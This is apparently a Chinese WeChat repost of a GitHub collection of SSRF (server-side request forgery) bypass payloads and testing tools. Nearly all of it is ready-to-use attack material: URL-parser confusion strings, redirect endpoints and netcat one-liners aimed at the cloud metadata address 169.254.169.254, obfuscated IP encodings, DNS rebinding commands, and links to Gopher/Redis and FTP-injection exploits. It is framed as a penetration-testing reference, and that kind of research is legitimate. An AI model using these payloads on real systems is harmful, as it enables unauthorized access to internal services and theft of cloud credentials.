SSRF(服务器端请求伪造)测试资源
基于快速URL的绕过:
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
htaccess - 针对各种情况的重定向测试
状态码:300,301,302,303,305,307,308
文件类型:jpg,json,csv,xml
现场演示:
JPG 301响应没有和有效的响应主体:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
没有和有效的响应主体的json 301响应:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
没有和有效的回应主体的csv 301回应:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
没有和有效的响应主体的xml 301响应:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
custom-30x - 使用PHP自定义30x响应和位置标题
现场演示:
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
custom-200 - 使用PHP自定义200响应和Content-Location标头
现场演示:
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
custom-201 - 使用PHP自定义201响应和位置标题
现场演示:
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
使用netcat的最小Web服务器
while true ; do nc -l -p 80 -c 'echo -e "HTTP/1.1 302 FoundnContent-Type: application/jsonnLocation: http://169.254.169.254/n{"a":"b"}"'; done
while true ; do nc -l -p 554 -c 'echo -e "RTSP/1.0 301 MovednCSeq: 1nLocation: http://169.254.169.254/"'; done
ip.py - 用于SSRF测试的备用IP编码工具
python ip.py IP PORT WhiteListedDomain EXPORT(可选)
python ip.py 169.254.169.254 80 www.google.com
python ip.py 169.254.169.254 80 www.google.com导出
DNS固定
nslookup ssrf-169.254.169.254.localdomain.pw
nslookup ssrf-cloud.localdomain.pw
http://xip.io/
nslookup 169.254.169.254.xip.io
nslookup 1ynrnhl.xip.io
nslookup www.owasp.org.1ynrnhl.xip.io
nslookup 127.127.127.127.xip.io
DNS固定争用条件
nslookup ssrf-race-169.254.169.254.localdomain.pw
DNS重新绑定
点子安装twised
python dns.py WhitelistedIP InternalIP Port
python dns.py 216.58.214.206 169.254.169.254 53
http://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9% A0 /
cloud-metadata.txt - 用于SSRF测试的云元数据字典
svg - 带有svg文件的SSRF
ffmpeg - 带有ffmpeg的SSRF
https://hackerone.com/reports/237381
https://hackerone.com/reports/243470
https://github.com/neex/ffmpeg-avi-m3u-xbin
https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15
iframe - 使用html iframe + URL旁路的SSRF
现场演示:
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/
滥用封闭的字母数字
http://169。254。169。254/
http://169。254。169。254/
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/
common-open-ports.txt - 常用端口列表
Java / Python FTP注入允许防火墙绕过
http://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html
https://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py
http://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
SSRF + Gopher + Redis
http://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5 %AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis /
https://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96
前5个常常容易出现SSRF漏洞的功能:
https://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
AppSecEU15-Server_side_browsing_considered_harmful.pdf
美国17财-A-NEW-ERA-OF-SSRF-开拓-URL解析器,在向的编程,Languages.pdf
一个小巧可爱的网址模糊器
https://github.com/orangetw/Tiny-URL-Fuzzer
通过滥用Ruby本地解析器中的错误绕过服务器端请求伪造过滤器
https://edoverflow.com/2017/ruby-resolv-bug/
https://hackerone.com/reports/287245
https://hackerone.com/reports/215105
0177.1 => 127.0.0.1
0x7f.1 => 127.0.0.1
127.1 => 127.0.0.1
SSRF提示
http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/
PHP的SSRF技术
https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
SSRF圣经
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM
SSRF代理
https://github.com/bcoles/ssrf_proxy
SSRF Proxy有助于通过易受服务器端请求伪造攻击的服务器隧穿HTTP通信
转载于GitHub,项目地址阅读原文!
以上临时工所述
我司一概不负责
本文始发于微信公众号(逢人斗智斗勇):SSRF Bypass Tips
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论